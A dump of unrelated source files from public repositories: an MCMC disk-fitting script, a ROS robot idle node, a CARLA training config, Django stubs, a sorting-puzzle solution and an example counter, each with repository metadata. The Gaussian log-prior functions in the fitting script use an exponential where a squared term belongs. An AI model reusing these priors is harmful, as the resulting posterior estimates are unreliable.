vhi_idx = np.min(np.where(vlsrk_native < vlo * 1e3))
vlo_idx = np.max(np.where(vlsrk_native > vhi * 1e3)) + 1
Nch = np.abs(vhi_idx - vlo_idx)
# extract the subset of native channels of interest, padded for windowing
data.VV = data.VV[vlo_idx-chpad:vhi_idx+chpad,:]
data.wgts = data.wgts[:,vlo_idx-chpad:vhi_idx+chpad].T
data.freqs = data.freqs[vlo_idx-chpad:vhi_idx+chpad]
vlsrk_native = c_ * (1. - data.freqs / nu_l)
data.rfreq = np.mean(data.freqs)
# find the LSRK velocities that correspond to the midpoint of the execution
# block (*HARD-CODED: still need to figure this out for real data*)
#
freq_npz = 'V892Tau.freq_conversions'
df = np.load('fake_data/data_uvfits/' + freq_npz + '.npz')
freq_LSRK_t = df['freq_LSRK'].copy()
v_LSRK_t = c_ * (1. - freq_LSRK_t / nu_l)
midstamp = np.int(v_LSRK_t.shape[0] / 2)
freq_LSRK_mid, v_LSRK_mid = freq_LSRK_t[midstamp,:], v_LSRK_t[midstamp,:]
# grab only the subset of channels that span our desired outputs
vhi_idx = np.min(np.where(v_LSRK_mid < np.min(vlsrk_native))) #- 1
vlo_idx = np.max(np.where(v_LSRK_mid > np.max(vlsrk_native))) + 1
v_LSRK_mid = v_LSRK_mid[vlo_idx:vhi_idx]
freq_LSRK_mid = freq_LSRK_mid[vlo_idx:vhi_idx]
# make a copy of the input (native) data to bin
data_bin = copy.deepcopy(data)
# clip the unpadded data, so divisible by factor chbin
data_bin.VV = data_bin.VV[chpad:chpad+Nch-(Nch % chbin),:]
data_bin.wgts = data_bin.wgts[chpad:chpad+Nch-(Nch % chbin),:]
data_bin.freqs = data_bin.freqs[chpad:chpad+Nch-(Nch % chbin)]
# identify which binned channels are censored (FALSE)
data_bin_vlsrk = c_ * (1 - data_bin.freqs / nu_l)
cens_chans = np.ones_like(data_bin_vlsrk, dtype='bool')
badc = (data_bin_vlsrk >= 1e3 * vclo) & (data_bin_vlsrk <= 1e3 * vchi)
cens_chans[badc] = 0
donotuse = np.any(cens_chans.reshape((-1, chbin)), axis=1)
# binning (weighted, decimated average)
avg_wts = data_bin.wgts.reshape((-1, chbin, data_bin.wgts.shape[1]))
data_bin.VV = np.average(data_bin.VV.reshape((-1, chbin, data_bin.VV.shape[1])),
weights=avg_wts, axis=1)
data_bin.wgts = np.sum(avg_wts, axis=1)
data_bin.freqs = np.average(data_bin.freqs.reshape(-1, chbin), axis=1)
data_bin.rfreq = np.mean(data_bin.freqs)
Nch_bin = len(data_bin.freqs)
### PRECALCULATED QUANTITIES
### ------------------------
# covariance matrix and its inverse
Mbin = (5./16.)*np.eye(Nch_bin) + \
(3./32.)*(np.eye(Nch_bin, k=-1) + np.eye(Nch_bin, k=1))
Mbin_inv = np.linalg.inv(Mbin)
# log-likelihood normalization constant
dterm = np.empty(data_bin.VV.shape[1])
for i in range(len(dterm)):
sgn, lndet = np.linalg.slogdet(Mbin / data_bin.wgts[:,i])
dterm[i] = sgn * lndet
L0 = -0.5 * (np.prod(data_bin.VV.shape) * np.log(2 * np.pi) + np.sum(dterm))
# now censor the appropriate binned channels (set weights = 0)
data_bin.wgts[donotuse == False,:] = 0
### INITIALIZE FOR POSTERIOR SAMPLING
### ---------------------------------
# fixed model parameters
FOV, dist, Npix, Tbmax, r0 = 6.0, 134.5, 256, 1500., 10. # previously dist = 130, Tbmax = 700
# initialize walkers
p_lo = np.array([ 45, 40, 4.5, 150, 0.1, 0.5, 150,
0.2, 5, 7.5, -0.18, 0.10])
p_hi = np.array([ 65, 60, 6.5, 350, 5, 1.5, 350,
0.8, 30, 9.0, -0.08, 0.20])
ndim, nwalk = len(p_lo), 5 * len(p_lo)
p0 = [np.random.uniform(p_lo, p_hi, ndim) for i in range(nwalk)]
# 1 model to set up GCF, corr caches
theta = p0[0]
# sound speed
mu_l, mH = 28, sc.m_p + sc.m_e
csound = np.sqrt(2 * sc.k * theta[6] / (mu_l * mH))
foo = cube_parser(inc=theta[0], PA=theta[1], dist=dist, mstar=theta[2], r0=r0,
r_l=theta[3], z0=theta[4], zpsi=theta[5],
Tb0=theta[6], Tbq=theta[7], Tbmax=Tbmax, Tbmax_b=theta[8],
dV0=csound, dVq=0.5*theta[7], FOV=FOV, Npix=Npix,
Vsys=theta[9], restfreq=nu_l, vel=v_LSRK_mid)
tvis, gcf, corr = vis_sample(imagefile=foo, uu=data.uu, vv=data.vv,
return_gcf=True, return_corr_cache=True,
mod_interp=False)
### PRIOR FUNCTIONAL FORMS
### ----------------------
# uniform
def lnpU(theta, lo, hi):
if ((theta >= lo) and (theta <= hi)):
return 0
else:
return -np.inf
# normal
def lnpN(theta, mu, sig):
return -0.5 * np.exp(-0.5 * (theta - mu)**2 / sig**2)
# normal + uniform
def lnpNU(theta, mu, sig, lo, hi):
if ((theta < lo) or (theta > hi)):
return -np.inf
else:
return -0.5 * np.exp(-0.5 * (theta - mu)**2 / sig**2)
### LOG(POSTERIOR)
### --------------
def lnprob(theta):
# calculate prior
ptheta = np.empty_like(theta)
ptheta[0] = lnpNU(theta[0], 54.5, 2., 0., 90.) #i (for negative inclination: lnpNU(theta[0], -54.5, 2., -90., 0.))
ptheta[1] = lnpNU(theta[1], 52.1, 2., 0., 360.) #PA
ptheta[2] = lnpU(theta[2], 0., 10.) #m
ptheta[3] = lnpNU(theta[3], 230., 30., r0, 0.5*(dist * FOV)) #r_l
ptheta[4] = lnpNU(theta[4], 1.0, 0.2, 0.1, 10.) #z0
ptheta[5] = lnpNU(theta[5], 1.0, 0.2, 0., 1.5) #zpsi
ptheta[6] = lnpU(theta[6], 5., Tbmax) #Tb0
ptheta[7] = lnpU(theta[7], 0., 2.) #Tbq
ptheta[8] = lnpNU(theta[8], 20., 2., 5., 50.) #Tback
ptheta[9] = lnpNU(theta[9], 8.2, 0.1, 7.5, 9.0) #v_sys
ptheta[10] = lnpNU(theta[10], -0.13, 0.02, -0.25, 0.0) #dx
ptheta[11] = lnpNU(theta[11], 0.15, 0.02, 0.0, 0.25) #dy
lnprior = np.sum(ptheta)
if (lnprior == -np.inf):
return -np.inf, -np.inf
# calculate sound speed
csound = np.sqrt(2 * sc.k * theta[6] / (mu_l * mH))
# generate a model cube
mcube = cube_parser(inc=theta[0], PA=theta[1], dist=dist, r0=r0,
mstar=theta[2], r_l=theta[3], z0=theta[4],
zpsi=theta[5], Tb0=theta[6], Tbq=theta[7],
Tbmax=Tbmax, Tbmax_b=theta[8], dV0=csound,
dVq=0.5*theta[7], FOV=FOV, Npix=Npix,
Vsys=theta[9], restfreq=nu_l, vel=v_LSRK_mid)
# sample the FT of the cube onto the observed (u,v) points
mvis = vis_sample(imagefile=mcube, mu_RA=theta[10], mu_DEC=theta[11],
gcf_holder=gcf, corr_cache=corr, mod_interp=False)
# window the visibilities
SRF_kernel = np.array([0.0, 0.25, 0.5, 0.25, 0.0])
mvis_re = convolve1d(mvis.real, SRF_kernel, axis=1, mode='nearest')
mvis_im = convolve1d(mvis.imag, SRF_kernel, axis=1, mode='nearest')
mvis = mvis_re + 1.0j*mvis_im
# interpolation
fint = interp1d(freq_LSRK_mid, mvis, axis=1, fill_value='extrapolate')
mvis = fint(data.freqs)
# excise the padded boundary channels to avoid edge effects
mvis = mvis[:,chpad:-chpad].T
mwgt = data.wgts[chpad:-chpad,:]
# clip for binning
mvis = mvis[:mvis.shape[0]-(mvis.shape[0] % chbin),:]
mwgt = mwgt[:mvis.shape[0]-(mvis.shape[0] % chbin),:]
# bin (weighted, decimated average)
mvis_bin = np.average(mvis.reshape((-1, chbin, mvis.shape[1])),
weights=mwgt.reshape((-1, chbin, mwgt.shape[1])),
axis=1)
# compute the log-likelihood
resid = np.absolute(data_bin.VV - mvis_bin)
lnL = -0.5 * np.tensordot(resid, np.dot(Mbin_inv, data_bin.wgts * resid))
# return the posterior
return lnL + L0 + lnprior, lnprior
### CONFIGURE EMCEE BACKEND
### -----------------------
filename = 'posteriors/'+datafile+suffix+'.h5'
#os.system('rm -rf '+filename)
backend = emcee.backends.HDFBackend(filename)
#backend.reset(nwalk, ndim)
# run the sampler
max_steps = 7000
with Pool() as pool:
sampler = emcee.EnsembleSampler(nwalk, ndim, lnprob, pool=pool,
backend=backend)
t0 = time.time()
sampler.run_mcmc(p0, max_steps, progress=True)
t1 = time.time()
print(' ')
print(' ')
print(' ')
print('This run took %.2f hours' % ((t1 - t0) / 3600))
| [
"vegajustin26@gmail.com"
] | vegajustin26@gmail.com |
0ee4bde0912431b07bd3f6d8bab8e461010a80cf | 0ec8745a351f23662fd2471f935d983a96194cf5 | /scripts/idle.py | 78d0b5300c10fbbb856bd952daf84516a73434fe | [] | no_license | robots21/jimmy | 8e885d9ed2fc79b2a6a0ab27ff829fd5d4280dc9 | 5452bc04604688d2fa126e416276755517c2f6c5 | refs/heads/master | 2020-05-16T21:47:58.242349 | 2014-04-11T00:05:06 | 2014-04-11T00:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,753 | py | #!/usr/bin/env python
import roslib; roslib.load_manifest('jimmy')
import rospy
from random import randint
from time import sleep
import time
from std_msgs.msg import String
from jimmy.msg import *
last_message_received_time = time.time()
def callback(data):
global last_message_received_time
print "GOT A MESSAGE"
last_message_received_time = time.time()
# idle = True
#print "IDLE motion interrupted"
# sleep(15)
#idle = False
#print "exit callback"
#wait 15 seconds when we hear input from somewhere else
def listener():
global last_message_received_time
rospy.init_node('idle_node', anonymous=True)
rospy.Subscriber("conversation", String, callback)
rospy.Subscriber("jimmy_send_gesture", jimmy_gesture, callback)
rospy.Subscriber("jimmy_send_servo", jimmy_servo, callback)
pub = rospy.Publisher("jimmy_idle", jimmy_gesture)
r = rospy.Rate(10)
while True:
# msg = jimmy_gesture()
# msg.cmd = randint(3,8)
#print "published gesture", msg.cmd
#pub.publish(msg)
#print "Gesture published"
if time.time() - last_message_received_time > 20:
# send a gesture here
last_message_received_time = time.time()
#print "last received a message %f seconds ago" % (time.time() - last_message_received_time)
#sleep(7)
r.sleep()
if __name__ == '__main__':
try:
idle = False
# espeak.set_parameter(espeak.Parameter.Rate,150)
# espeak.set_parameter(espeak.Parameter.Pitch,99)
## espeak.set_parameter(espeak.Parameter.Wordgap,)
# espeak.set_voice("en-sc")
# print "Ready to speak!"
listener()
except rospy.ROSInterruptException: pass
| [
"sophia.li@students.olin.edu"
] | sophia.li@students.olin.edu |
212dee1c894a426afc6a56693bd2a0927cc282fc | 0eda49f82fee0f7b8247fbea108861d3b54ab872 | /carla/configuration/ak23_ca17_doubledata.py | 5f5c43e9da9bfce619d298c411768e0556060cb0 | [] | no_license | jainSamkit/demo_codes | 08295b4e9c42e1e8ef5162030ef6489a6d67a8e8 | 9d4a4e9bf1cb0ce4dbf1bba21c06342c942576a2 | refs/heads/master | 2020-05-05T03:32:13.138218 | 2019-04-05T13:01:09 | 2019-04-05T13:01:09 | 179,676,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,505 | py | #this file trains for data from virtual world elektra data by agent;steer only, implementing fak17_cf45_steer.py
#also does augmentation for seven cameras
#it has data for forward and backward laps
import random
import imgaug as ia
from imgaug import augmenters as iaa
import os
import glob
#
# This is a config file, with three parts: Input, Training, Output, which are then joined in Main
#
class configMain:
def __init__(self):
# this is used for data balancing. Labels are balanced first, and then for each label group
# the [-1,1] interval is split into so many equal intervals
# when we need to sample a mini-batch, we sample bins and then sample inside the bins
self.number_steering_bins = 2
self.batch_size = self.number_steering_bins*60
self.batch_size_val = self.number_steering_bins*60
self.number_images_val = 20* self.batch_size_val # Number of images used in a validation Section
self.sequence_size_lstm = 0
self.fusion_size =1
self.sequence_size =(self.fusion_size)*2 # this 2 is about reducing the frame rate 2x
self.sequence_resample = self.fusion_size
self.resample_stride = self.sequence_size/self.sequence_resample
self.sequence_stride = self.sequence_size/2 # this is also about the frame rate
self.number_of_sequences = self.batch_size/(self.sequence_size_lstm+1)
#self.input_size = (227,227,3)
#self.manager_name = 'control_speed'
# y , x
self.image_size = (88,200,3)
self.network_input_size = (88,200,3)
self.variable_names = ['Steer','Gas','Brake','Hand_B','Reverse','Steer_N','Gas_N','Brake_N','Pos_X','Pos_Y','Speed',\
'C_Gen','C_Ped','C_Car','Road_I','Side_I','Acc_x','Acc_y','Acc_z','Plat_Ts','Game_Ts','Ori_X','Ori_Y',\
'Ori_Z','Control','Camera','Angle']
# _N is noise, Yaw_S is angular speed
self.targets_names =['Steer']
self.targets_sizes = [1]
#self.inputs_names =['Control']
#self.inputs_sizes = [4]
# if there is branching, this is used to build the network. Names should be same as targets
# currently the ["Steer"]x4 should not be changed
self.branch_config = [["Steer"]]
# a list of keep_prob corresponding to the list of layers:
# 8 conv layers, 2 img FC layer, 5 branches X 2 FC layers each
self.dropout = [0.8]*8 + [0.5]*2 + [0.5,.5]*len(self.branch_config)
self.restore = True # This is if you want to restore a saved model
self.sensor_names = ['rgb','labels'] #what all you want to store
self.sensors_size = [(88,200,3),(88,200,1)]
self.models_path = os.path.join('models', os.path.basename(__file__).split('.')[0])
self.train_path_write = os.path.join(self.models_path, 'train')
self.val_path_write = os.path.join(self.models_path, 'val')
self.test_path_write = os.path.join(self.models_path, 'test')
self.number_iterations = 300000 # 300k
self.number_steering_branches = 0
# Control the execution of simulation testing during training
self.perform_simulation_test = False
self.output_is_on = True
self.pre_train_experiment = None
class configInput(configMain):
def __init__(self):
configMain.__init__(self)
st = lambda aug: iaa.Sometimes(0.4, aug)
oc = lambda aug: iaa.Sometimes(0.3, aug)
rl = lambda aug: iaa.Sometimes(0.09, aug)
self.augment = iaa.Sequential([
rl(iaa.GaussianBlur((0, 1.5))), # blur images with a sigma between 0 and 1.5
rl(iaa.AdditiveGaussianNoise(loc=0, scale=(0.0, 0.05), per_channel=0.5)), # add gaussian noise to images
oc(iaa.Dropout((0.0, 0.10), per_channel=0.5)), # randomly remove up to X% of the pixels
oc(iaa.CoarseDropout((0.0, 0.10), size_percent=(0.08, 0.2),per_channel=0.5)), # randomly remove up to X% of the pixels
oc(iaa.Add((-40, 40), per_channel=0.5)), # change brightness of images (by -X to Y of original value)
st(iaa.Multiply((0.10, 2.5), per_channel=0.2)), # change brightness of images (X-Y% of original value)
rl(iaa.ContrastNormalization((0.5, 1.5), per_channel=0.5)), # improve or worsen the contrast
rl(iaa.Grayscale((0.0, 1))), # put grayscale
],
random_order=True # do all of the above in random order
)
self.augment_labels = False
self.augment_amount = 1 #3=max, 2=mid, 1=min
self.labels_to_augment = {"road": True, "buildings": True, "grass": True, "sky_n_zebra": True }
# there are files with data, 200 images each, and here we select which ones to use
#5self.dataset_name = 'Carla'
#with open(os.path.join(self.save_data_stats, 'path'),'r') as f:
# path = f.read().strip()
path = '../VirtualElektraData2_Double'
train_path = os.path.join(path, 'SeqTrain')
val_path = os.path.join(path, 'SeqVal')
print train_path, val_path
self.train_db_path = [os.path.join(train_path, f) for f in glob.glob1(train_path, "data_*.h5")]
self.val_db_path = [os.path.join(val_path, f) for f in glob.glob1(val_path, "data_*.h5")]
# When using data with noise, remove the recording during the first half of the noise impulse
# TODO Felipe: change to noise percentage.
self.remove_noise = False
# Speed Divide Factor
#TODO: FOr now is hardcooded, but eventually we should be able to calculate this from data at the loading time.
self.speed_factor = 1.0 # In KM/H FOR GTA it should be maximun 30.0
# The division is made by three diferent data kinds
# in every mini-batch there will be equal number of samples with labels from each group
# e.g. for [[0,1],[2]] there will be 50% samples with labels 0 and 1, and 50% samples with label 2
self.labels_per_division = [[2],[2],[2]]
self.dataset_names = ['targets']
self.queue_capacity = 20*self.batch_size
# TODO NOT IMPLEMENTED Felipe: True/False switches to turn data balancing on or off
self.balances_val = True
self.balances_train = True
self.augment_and_saturate_factor = True
class configTrain(configMain):
def __init__(self):
configMain.__init__(self)
self.loss_function = 'mse_branched' # Chose between: mse_branched, mse_branched_ladd
self.control_mode ='base_no_speed'
self.learning_rate = 0.0002 # First
self.training_schedule = [[50000,0.5],[100000,0.5*0.5],[150000,0.5*0.5*0.5],[200000,0.5*0.5*0.5*0.5],[250000,0.5*0.5*0.5*0.5*0.5]] # Number of iterations, multiplying factor
self.lambda_l2 = 1e-3 # Not used
self.branch_loss_weight = [1]
self.variable_weight = {'Steer':1.0}
self.network_name = 'baseNet_deeper_noSpeed'
self.lambda_tolerance = 5
self.is_training = True
self.selected_gpu = "0"
self.state_output_size = (0)
class configOutput(configMain):
def __init__(self):
configMain.__init__(self)
self.print_interval = 2
self.summary_writing_period = 20
self.validation_period = 1000 # I consider validation as an output thing since it does not directly affects the training in general
self.feature_save_interval = 100
self.use_curses =True # If we want to use curses library for a cutter print
self.targets_to_print = ['Steer'] # Also prints the error. Maybe Energy
self.selected_branch = 0 # for the branches that have steering we also select the branch
self.inputs_to_print = ['Steer']
""" Feature Visualization Part """
# TODO : self.histograms_list=[] self.features_to_draw= self.weights_to_draw=
'''class configTest(configMain):
def __init__(self):
configMain.__init__(self)
self.interface_name = 'Carla'
self.driver_config = "3cam_carla_drive_config"
# This is the carla configuration related stuff'''
| [
"samkit@flytbase.com"
] | samkit@flytbase.com |
5b6fb0044aa0fdc39f7c453806b7c39d69030f1a | 8f56c6b257513990bf43e2dd2a49be5c46b155b2 | /testnew/testnew/testnew.py | 13aa908ee2bce21d0c1c91e4b697fb32681ae4b7 | [] | no_license | coldbasement/repos | 8c1d4ff9093d20ad1680166dafbfaf62d681ba0f | 268fcdb8f3f13268a99013f88add4509106119a4 | refs/heads/master | 2020-03-19T12:02:00.180982 | 2018-06-07T21:17:52 | 2018-06-07T21:17:52 | 136,491,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py |
def main():
import math
x = math.sin(3.14)
print(x)
main()
| [
"kodycarling19@gmail.com"
] | kodycarling19@gmail.com |
a61449f3af766300839db6e67e98a60f40fbf345 | 4da6c0e0817e7eb2c9fe56c8a910493f671500ac | /count_examples.py | b03e1f73d2ace86862090847ccc4b4be33ce9d79 | [] | no_license | jasmainak/mne_biomag2012_poster | ea610284a872582ee3eb376e5dcf0535de86da47 | 9cb11a4d42c770ca55ff27a884d83cae103c6152 | refs/heads/master | 2020-12-25T15:30:26.020379 | 2016-06-12T13:38:46 | 2016-06-12T13:38:46 | 60,969,076 | 0 | 0 | null | 2016-06-12T13:40:41 | 2016-06-12T13:40:41 | null | UTF-8 | Python | false | false | 716 | py | """Find number of examples in MNE-Python.
"""
# Author: Mainak Jas <mainak.jas@telecom-paristech.fr>
import os
import os.path as op
import fnmatch
from mne.datasets import sample
def recursive_search(path, pattern):
"""Auxiliary function for recursive_search of the directory.
"""
filtered_files = list()
for dirpath, dirnames, files in os.walk(path):
for f in fnmatch.filter(files, pattern):
filtered_files.append(op.realpath(op.join(dirpath, f)))
return filtered_files
# assuming sample data is in examples dir
example_path = op.dirname(sample.data_path())
example_files = recursive_search(example_path, '*.py')
print('Number of examples is %d' % len(example_files))
| [
"mainakjas@gmail.com"
] | mainakjas@gmail.com |
78e205ae750a4be5a068a55c9c559e1374f631e3 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /hacker_rank/domains/algorithms/sorting/almost-sorted_sunghyo.jung.py | 0264ebbc94a8388fd6ffbfafa0b6f4d7256e3e34 | [] | no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | n = int(input())
ar = map(int, raw_input().split())
d = []
for i in range(1, n):
if ar[i] < ar[i - 1]:
d.append(i)
if len(d) == 1:
a, b = d[0] - 1, d[0]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
elif len(d) == 2:
a, b = d[0] - 1, d[1]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
else:
a = d[0] - 1
b = d[len(d) - 1]
if b - a != len(d):
print("no")
else:
print("yes")
print("reverse %d %d" % (a + 1, b + 1))
| [
"sunghyo.jung@navercorp.com"
] | sunghyo.jung@navercorp.com |
8cdbe52a7d1fd25646f72b1380e0fb36d2bf577b | fa4350b54764c27f03f00b74d9ab2fa6f5b463cf | /ProfilePage/migrations/0013_merge_20200502_2143.py | 2ff0ba20f87eb734a3e828b904f578495620d9bd | [] | no_license | jakefahy/TheMemeExchange | 6cddf4c4674dede2c07147be85879495b136018f | b85aa7e3e5df72f45a9707df8401b68dfc7a8952 | refs/heads/master | 2022-12-10T12:50:43.848333 | 2020-05-10T00:27:18 | 2020-05-10T00:27:18 | 243,138,859 | 0 | 0 | null | 2022-12-08T03:44:40 | 2020-02-26T01:17:16 | HTML | UTF-8 | Python | false | false | 279 | py | # Generated by Django 3.1 on 2020-05-02 21:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('ProfilePage', '0012_imagelink_username'),
('ProfilePage', '0012_auto_20200420_2212'),
]
operations = [
]
| [
"rbeck@csumb.edu"
] | rbeck@csumb.edu |
56d1e200aed3c2fb8edbf994fc0bed8f68d2b74d | 719a04c1b7fba23fac117a30e52ec588ec28c86e | /Django/proj1/proj1/view.py | a84dccd393df725f22a2336f635751dd489bcd00 | [] | no_license | BobXGY/PythonStudy | 1cbe2efc6f537ffbfb3141ef22d1cac0a9196a28 | 19e0491a15ba4cb29686a85c3a1c8500901ec173 | refs/heads/master | 2021-07-09T07:07:32.113174 | 2019-02-27T11:00:48 | 2019-02-27T11:00:59 | 148,768,967 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author Bob
# @create time 2018/12/20 14:38
# @file view.py
# @software PyCharm
from django.http import HttpResponse
def hello(request):
return HttpResponse("hello django")
| [
"736385398@qq.com"
] | 736385398@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.